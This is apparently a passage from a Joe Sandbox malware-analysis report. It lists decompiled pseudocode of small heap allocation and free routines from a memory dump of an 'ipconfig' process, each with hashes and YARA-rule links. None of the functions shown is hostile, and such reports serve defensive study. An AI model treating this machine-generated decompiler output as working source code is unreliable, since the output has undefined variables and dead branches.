				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2f8d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E02EB7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













              0x02f68ce5
              0x02f68ced
              0x02f68cf0
              0x02f68cfb
              0x02f68d0d
              0x02f68cfd
              0x02f68d06
              0x02f68d06
              0x02f68d18
              0x02f68d19
              0x02f68d1b
              0x02f68d20
              0x02f68d33

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8baa3e5d9e51faec8bce2e3b28daa0f44034f36b5d45c76d8684e46eb4dd988e
              • Instruction ID: 75ab79d94ae2a76aeac8d9501cfe36ac3d5838f2969334d4398f59d33e5c1c56
              • Opcode Fuzzy Hash: 8baa3e5d9e51faec8bce2e3b28daa0f44034f36b5d45c76d8684e46eb4dd988e
              • Instruction Fuzzy Hash: 01F0E271A44208AFCB00DBB8E845EAEB7B4EF09344F10419DF912EB2C0EA34D900CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EB746D Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 88%
              			E02EB746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E02EAEB70(__ecx, 0x2f879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E02ED95D0();
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









              0x02eb746d
              0x02eb746d
              0x02eb746d
              0x02eb7471
              0x02eb7488
              0x02eff92d
              0x02eb748e
              0x02eb7491
              0x02eb7495
              0x02eff937
              0x02eff93a
              0x02eff94e
              0x02eff953
              0x02eff956
              0x02eff956
              0x02eb7495
              0x00000000
              0x02eb7488
              0x02eb7473
              0x02eb7478
              0x02eb747d
              0x02eb7481
              0x00000000
              0x02eb7481
              0x02eb747d
              0x02eb747a
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 768196e5e366c3358be6c0ae5f80882a567a7cafd88df359da0f8973592f0e87
              • Instruction ID: 20972d8f6868c6d44fe2bc7adc75cb4b4e84d30e2d06fb3b2767696714883db5
              • Opcode Fuzzy Hash: 768196e5e366c3358be6c0ae5f80882a567a7cafd88df359da0f8973592f0e87
              • Instruction Fuzzy Hash: 9AF05936EC4144AACF039768C840BFBFBB2AF8431AF04F215EA51AB850E724D800CB85
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECA44B Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02ECA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x2f87b9c; // 0x0
				_t15 = __ecx;
				_t16 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E02EDFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







              0x02eca44b
              0x02eca453
              0x02eca472
              0x02eca476
              0x00000000
              0x02eca493
              0x02eca47a
              0x02eca47f
              0x02eca486
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a0c36cc993f7bd58d0d2691c29025d6d3f4d5b22a6d074b8669700d26d9429d9
              • Instruction ID: fdf0d27c5896c0e342ba7c35e4aec8cc401738b4d7120a6e643edd286fb2dcac
              • Opcode Fuzzy Hash: a0c36cc993f7bd58d0d2691c29025d6d3f4d5b22a6d074b8669700d26d9429d9
              • Instruction Fuzzy Hash: 21E02272A81420ABC2229E68AC00FA7B39EEBD0641F198038F904C7214D638DD02C7E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9F358 Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E02E9F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E02ECF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L02EB4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






              0x02e9f35d
              0x02e9f361
              0x02e9f367
              0x02e9f372
              0x02e9f38c
              0x02e9f38c
              0x02e9f394

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
              • Instruction ID: a1461df6462f9ed7122915e6cb444374a43381318aa856769b298d6f8bc16c14
              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
              • Instruction Fuzzy Hash: 92E0D832A80118BBCB21DAD99E05FDBBBADDB44B60F109196B904D7550D5789D00C6D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EAFF60 Relevance: .0, Instructions: 22COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EAFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2e711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E02F688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E02EB0050(_t14);
				}
			}










              0x02eaff66
              0x02eaff6b
              0x00000000
              0x02eaff8f
              0x00000000
              0x02eaff8f

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0077543f3912de4ba3cdf680246aba5faddf7207f07ac25484a878f6d3104050
              • Instruction ID: 1ab6f0ff2f3ffa34a3c8f015deeca77795db0c8a40c63f189454a209a4a6544e
              • Opcode Fuzzy Hash: 0077543f3912de4ba3cdf680246aba5faddf7207f07ac25484a878f6d3104050
              • Instruction Fuzzy Hash: 9AE0DFB82853049FD734DB63D1E0F26379A9F42769F19E45DE0084F901C723F880C656
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F4D380 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02F4D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L02E9E8B0(__ecx, _a4, 0xfff);
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




              0x02f4d38a
              0x02f4d39b
              0x02f4d3b1
              0x00000000
              0x02f4d3b6
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
              • Instruction ID: a4ab050d4e0429bdef54c7c97871491f3a5230cd0f2097bfce8c389e5f606b74
              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
              • Instruction Fuzzy Hash: 4EE0C232281254FBDF225E44CC00FB9BB16DF407E5F148032FF485AAA0CAB19C91DAC4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F241E8 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E02F241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x2f708f0);
				_t5 = E02EED08C(__ebx, __edi, __esi);
				if( *0x2f887ec == 0) {
					E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x2f887ec == 0) {
						 *0x2f887f0 = 0x2f887ec;
						 *0x2f887ec = 0x2f887ec;
						 *0x2f887e8 = 0x2f887e4;
						 *0x2f887e4 = 0x2f887e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L02F24248();
				}
				return E02EED0D1(_t5);
			}





              0x02f241e8
              0x02f241ea
              0x02f241ef
              0x02f241fb
              0x02f24206
              0x02f2420b
              0x02f24216
              0x02f2421d
              0x02f24222
              0x02f2422c
              0x02f24231
              0x02f24231
              0x02f24236
              0x02f2423d
              0x02f2423d
              0x02f24247

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 26b921cab069315aefed46c4486eab1d37c01ed513353a9309432e2e6393236c
              • Instruction ID: 3c168028a63fd33484e53f3f47de43ea0a43b19a6f2bf696a1b00b3bb8bc1e8c
              • Opcode Fuzzy Hash: 26b921cab069315aefed46c4486eab1d37c01ed513353a9309432e2e6393236c
              • Instruction Fuzzy Hash: CDF01578CE070CCFDBA0EFA9990072CF6B5F744BD0F80996A920187284C7B84494CF01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECA185 Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02ECA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x2f867e4 >= 0xa) {
					if(_t5 < 0x2f86800 || _t5 >= 0x2f86900) {
						return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E02EB0010(0x2f867e0, _t5);
				}
			}





              0x02eca190
              0x02eca1a6
              0x02eca1c2
              0x00000000
              0x00000000
              0x00000000
              0x02eca192
              0x02eca192
              0x02eca19f
              0x02eca19f

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e19d96b0560b3a29de1c4788509e1ac4eee2c55f047903de94ae0ba2c53300a0
              • Instruction ID: 4c5e285a8efb547836934f2e1f3d64dde6219994377a90343956e867575ea7d2
              • Opcode Fuzzy Hash: e19d96b0560b3a29de1c4788509e1ac4eee2c55f047903de94ae0ba2c53300a0
              • Instruction Fuzzy Hash: 8FD0C2A11E04081ACB2D2F509A14B27A21AEB80B50F30A82CF2068AB90DE64C8E18559
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC16E0 Relevance: .0, Instructions: 17COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EC16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E02EC1710(0x2f867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L02EB4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





              0x02ec16e8
              0x02ec16ef
              0x02ec16f3
              0x02ec16fe
              0x00000000
              0x02ec1700
              0x02ec170d
              0x02ec170d
              0x02ec16f2
              0x02ec16f2
              0x02ec16f2
              0x02ec16f2

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0db95d1a0176d9212a85f92d4bb3d67894918e2c9c9adc1a026f8ee1eb86c81
              • Instruction ID: 9e31ca5cddd544ebcb0606a7b30b60a9cfd1eafc8c7300c61e198964cadfacce
              • Opcode Fuzzy Hash: e0db95d1a0176d9212a85f92d4bb3d67894918e2c9c9adc1a026f8ee1eb86c81
              • Instruction Fuzzy Hash: 9FD0A73118014052DA2D6F509914B152256DB80B89F38506CF20F4D4C2CFB4CC93E448
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F153CA Relevance: .0, Instructions: 16COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02F153CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E02EAEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








              0x02f153ca
              0x02f153ce
              0x02f153d9
              0x02f153de
              0x02f153e1
              0x02f153e1
              0x02f153e6
              0x02f153f3
              0x00000000
              0x02f153f8
              0x02f153fb

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
              • Instruction ID: 3c090ea49e20523152089110053050b7b2778f518f3627cab97833fcf70c11f5
              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
              • Instruction Fuzzy Hash: 50E08C329406809BCF16DB48C660F4EB7F6FB84B40F580014B0085FA20C724EC00CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EAAAB0 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EAAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




              0x02eaaab6
              0x02eaaabb
              0x02efa442
              0x00000000
              0x02efa448
              0x02efa454
              0x02efa454
              0x02eaaac1
              0x02eaaac1
              0x02eaaac6
              0x02eaaac6

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
              • Instruction ID: d1c05ec647f1e093de3ff3f5de3ef2d5cd90024d772aeb78fed42e82d51b07ca
              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
              • Instruction Fuzzy Hash: D0D0E935392A80CFD656CF5DC564B1577B4BB44B48FC554A0E905CF761E72CED44CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC35A1 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EC35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E02EAEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






              0x02ec35a1
              0x02ec35a1
              0x02ec35a5
              0x02ec35ab
              0x02ec35ab
              0x02ec35b5
              0x00000000
              0x02ec35c1
              0x02ec35b7

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
              • Instruction ID: 031b44c6913209c11d452e5d8e2f385486f40919195f290060de2e85500c2952
              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
              • Instruction Fuzzy Hash: 90D0C9315D21849EDB51ABA0C3287A877B2BB0021CF78F0EDA4460A952C33A4A5BDA41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9DB40 Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02E9DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L02EB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





              0x02e9db4d
              0x02e9db54
              0x02e9db5f
              0x02e9db56
              0x02e9db56
              0x02e9db5c
              0x02e9db5c

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
              • Instruction ID: d7e8d85a298121fd81105beaa6531068d437d9cd9a1f15e56549729edc07d7a3
              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
              • Instruction Fuzzy Hash: D2C08C302D0A00AAEB222F20CD11B4136A1BB00B09F4440A07300DA0F0EB78D801EA00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F1A537 Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02F1A537(intOrPtr _a4, intOrPtr _a8) {

				return L02EB8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



              0x02f1a553

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
              • Instruction ID: 8a031d8789e0cf3e9763d8b54f14058e9d1c534a6b157fc65e0cae6214a24460
              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
              • Instruction Fuzzy Hash: A6C01236080248BBCB12AE81CC01F467B2AEB94B60F008020BA080A6608632E970EA84
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EB3A1C Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EB3A1C(intOrPtr _a4) {
				void* _t5;

				return L02EB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




              0x02eb3a35

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
              • Instruction ID: 1d8066527fe3063ae0a05230e3f357edec9ff9cc176280e7b4ee98b10a6dcb7d
              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
              • Instruction Fuzzy Hash: 39C08C32080248BBC7126E41DC00F027B2AEB90B60F004020B6040A5A18532EC60D988
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA76E2 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EA76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




              0x02ea76e4
              0x00000000
              0x02ea76f8
              0x02ea76fd

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
              • Instruction ID: 878f673fcc973cae60af8aaf7c6d90c7eee1a14c50d0a7273e7e97c67fdaf70a
              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
              • Instruction Fuzzy Hash: 1CC08C711C11C05AEB2A970CCE30B29B690AF8870DF48619CBA410D8A1C368B802C608
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC36CC Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EC36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



              0x02ec36d2
              0x02ec36e8
              0x02ec36d4
              0x02ec36e5
              0x02ec36e5

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
              • Instruction ID: 56cce355af4dfdb317359b130bcd535939f1474b28df2674d9d2f9f3d2555d41
              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
              • Instruction Fuzzy Hash: 75C02BB01D0440BBD7166F30CE10F157354FB00B21F7443D87220454F0D6389C00D500
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9AD30 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02E9AD30(intOrPtr _a4) {

				return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



              0x02e9ad49

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
